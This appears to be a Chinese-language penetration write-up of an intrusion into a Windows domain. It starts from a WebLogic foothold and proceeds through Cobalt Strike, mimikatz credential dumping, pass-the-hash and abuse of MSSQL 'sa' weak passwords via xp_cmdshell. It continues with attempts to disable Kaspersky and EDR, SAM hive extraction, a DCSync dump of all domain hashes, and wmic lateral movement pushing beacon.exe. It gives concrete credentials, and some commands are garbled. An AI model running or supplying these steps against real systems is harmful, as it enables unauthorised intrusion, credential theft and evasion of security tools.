记一次常规的域渗透

1.入口是weblogic，上线无杀软，不再赘述写webshell和下载马子的过程，因此直接到上线cs：

一上来不要大规模的扫描，先对网络环境进行信息收集，发现没有域环境：

systeminfo

使用cs自带的mimikatz功能导出密码：

cs: logonpasswords

对该网段使用该凭证进行pth横向（通过hash进行传递）：

该网段均横向失败，对fscan扫描结果进行数据处理，发现内网存在域和exchange，且没有弱口令，尝试对扫描出来的17-010和spring漏洞测试均尝试失败：

于是使用frp挂上代理进内网扫描弱口令

发现一个弱口令，尝试链接，成功登录并命令执行，但是是服务权限：

23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "whoami"

使用自带的clr_efspotato，提权失败：

23.exe 20.20.20.17 sa sa@12345 master clr_efspotato "whoami"

尝试使用SharpSQLTools上传提权文件，通过提权文件进行添加用户，远程桌面登陆后，手动执行beacon.exe

23.exe 20.20.20.17 sa sa@12345 master sourcefile destationfile

提权成功后接下来尝试添加用户：(这里引号需要转义，多加一个引号即可)

23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "cmd.exe /c 666.exe ""net user jijida admin!@#45""

okkkkkkkkkk，尝试登录：

发现卡巴斯基和edr，直接关闭：

私密马赛，我没能关掉，尝试通过导出密码拿下高用户的权限：

reg save hklmsam sam.hivereg save hklmsystem system.hive

本地secertdump解密这里我是从远程桌面托文件下来所以很卡，只选择下载了两个文件，security可以选择不下载：

python secretsdump.py -system system.hive  -sam sam.hive local

administrator账户进行解密得到密码：@Nn031985

成功拿到管理员权限，在当前权限下继续使用当前账户进行横向：

发现17，20，25，57都可以横向

在57上发现域环境：

存在卡巴斯基，直接关闭，上传beacon.exe:

上线cs：

使用当前会话进行信息收集，导出密码的过程中发现一些邮箱口令：

注入域管进程：

在域管进程下进行域环境的信息收集，先查域管：

net group "domain admins" /domain

域成员：

net user /domain

找域控：

ping dc

这里不选择添加账户密码的话，默认选择当前权限（域管权限）进行横向：

wmic /mode:20.20.20.85 os get name

导出域内所有用户hash，这里使用mimikatz自带的dcsync功能：

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

20上有个exchange服务，尝试对20进行横向渗透：

建立ipc链接后，使用UNC路径传马：

\ipC$

成功上线：

wmic /node:20.20.20.20 process call create "cmd.exe /c beacon.exe"

传马子：

上线：

新建一个域管：

3389尝试登录：